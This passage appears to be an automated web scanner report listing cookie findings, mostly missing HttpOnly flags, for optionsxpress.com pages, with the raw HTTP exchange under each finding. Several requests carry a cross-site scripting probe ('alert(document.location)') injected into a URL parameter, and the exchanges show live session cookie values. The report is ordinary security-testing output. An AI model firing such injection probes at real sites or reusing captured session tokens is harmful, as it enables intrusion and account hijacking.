Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: XYZAB_AM.LOGIN=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: XYZAB=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: URL_PARAM=forwardTo=1; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: JSESSIONID=6CABFA1224B746F03649A64DE5E8609E.wwwsso3; Path=/sso; Secure
Content-Length: 13244
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"/>
   <link hre
...[SNIP]...

10.8. https://www.optionsxpress.com/new_account.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:45:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:45:33 GMT
Set-Cookie: ASPSESSIONIDSAASBSDA=IICGFGHAGIOCHNMHCMJLCMKM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

10.9. https://www.optionsxpress.com/new_account.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /new_account.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new_account.asp?intcmp=lp_sales_futures HTTP/1.1
Host: www.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Firm=OX; TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; CMPID=gsus23305007; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; TLTHID=3DAC4327436FC1E882AB69BF2C12F5CC; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007

Response

HTTP/1.1 302 Object moved
Date: Thu, 08 Sep 2011 19:25:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
Content-Length: 208
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:25:16 GMT
Set-Cookie: ASPSESSIONIDQCDSCTCB=DJOPBMDAGLGCJENDBNKKAEHI; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&amp;firm=OX">here</a>.
...[SNIP]...

10.10. https://www.optionsxpress.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.optionsxpress.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp HTTP/1.1
Host: www.optionsxpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 08 Sep 2011 19:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCSTSAQDA=EALHAKIANBNPKJOEIOKNNICO; path=/
Set-Cookie: TLTHID=23D6A57C4BE8F428BC3F1C97DD0273A0; Path=/; Domain=.optionsxpress.com
HostName: DAWEB25
Set-Cookie: TLTCNT=DAWEB250000000000012272
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close


10.11. http://360.sorensonmedia.com/7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://360.sorensonmedia.com
Path:   /7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7d285f50de540c4b64C9b74Y99dcc88d0ad6/embedv2.js HTTP/1.1
Host: 360.sorensonmedia.com
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
cache-control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=utf-8
Date: Thu, 08 Sep 2011 19:24:43 GMT
pragma: no-cache
Server: nginx/0.5.33
Set-Cookie: AWSELB=7399391306302201EC8ED885C1DF301EBE94B9D3266A90D7C75A424550F489FD629C2C3ACAAE7C766E443396D53A4DBE988DB00D0CFDBC4B96568304D3BBF7D375BA252957;PATH=/;MAX-AGE=172800
Content-Length: 4402
Connection: keep-alive


var embedCode = "<object style='outline:none;' width='100%' height='100%' type='application/x-shockwave-flash' data='http://static.cdn.360.sorensonmedia.com/1/flash/flowplayer-3.2.2.swf' id='videoPla
...[SNIP]...

10.12. https://account.optionsxpress.com/OpenAccount/Index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86733
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:25:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=8BDB9C054DE94B794A725090608A94A2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...

10.13. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/NewAccountAjax/GenericHandler

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/NewAccountAjax/GenericHandler?methodName=GetFirmFromCountry&parameters=1 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DAA835CC43F5D88C7C759C8916AE73EE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

"OX"

10.14. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/nap.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/nap.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 8210
Content-Type: text/css
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/nap.css
Last-Modified: Tue, 24 May 2011 16:44:37 GMT
Accept-Ranges: bytes
ETag: "80482bde311acc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

*
{
margin: 0;
padding: 0; /*font:bold 12px "Lucida Grande", Arial, sans-serif; */
}

#columnContainerTwo,
#openAccount
...[SNIP]...

10.15. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napgeneral.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napgeneral.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 69748
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js
Last-Modified: Tue, 10 May 2011 16:55:21 GMT
Accept-Ranges: bytes
ETag: "80623dc33fcc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

10.16. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/naponload.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/naponload.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 12001
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/naponload.js
Last-Modified: Tue, 23 Nov 2010 14:53:52 GMT
Accept-Ranges: bytes
ETag: "040423e1e8bcb1:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

10.17. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napvalidate.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napvalidate.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 154727
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js
Last-Modified: Thu, 07 Apr 2011 17:11:23 GMT
Accept-Ranges: bytes
ETag: "802f1d246f5cb1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

10.18. https://account.optionsxpress.com/css/oxps.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /css/oxps.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/oxps.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 66752
Content-Type: text/css
Last-Modified: Mon, 10 May 2010 20:56:05 GMT
Accept-Ranges: bytes
ETag: "b095c23483f0ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

@import url("https://images.optionsxpress.com/css/reset.css");

html,body {
   background: #ffffff;
   background-image: url("https://images.optionsxpress.com/images/prelogin/ox_bg.jpg");
   margin: 0p
...[SNIP]...

10.19. https://account.optionsxpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=61F93426422DA13562D689B5022DBFC6

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F04D32D8484F69A30C544985DCE10F86; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:31 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

10.20. https://account.optionsxpress.com/images/btn_next_step.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/btn_next_step.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_next_step.jpg HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 2414
Content-Type: image/jpeg
Last-Modified: Wed, 05 Nov 2008 18:29:43 GMT
Accept-Ranges: bytes
ETag: "805ab78743fc91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8232ADF480D39289D31E09763CACF10; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.X..
...[SNIP]...

10.21. https://account.optionsxpress.com/images/icon_arrow.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icon_arrow.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icon_arrow.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: image/jpeg
Last-Modified: Thu, 10 Jul 2008 18:51:58 GMT
Accept-Ranges: bytes
ETag: "6027ab7bee2c81:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..............................................................................................................
...[SNIP]...

10.22. https://account.optionsxpress.com/images/icons/log_in.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icons/log_in.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icons/log_in.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 1929
Content-Type: image/gif
Last-Modified: Thu, 06 Nov 2008 19:47:15 GMT
Accept-Ranges: bytes
ETag: "80a3e3774840c91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a2.&....]...........{........6b|........................P}.U..........................l....................Iv.........................Ly..........z...........z....................................
...[SNIP]...

10.23. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_ox.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_ox.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

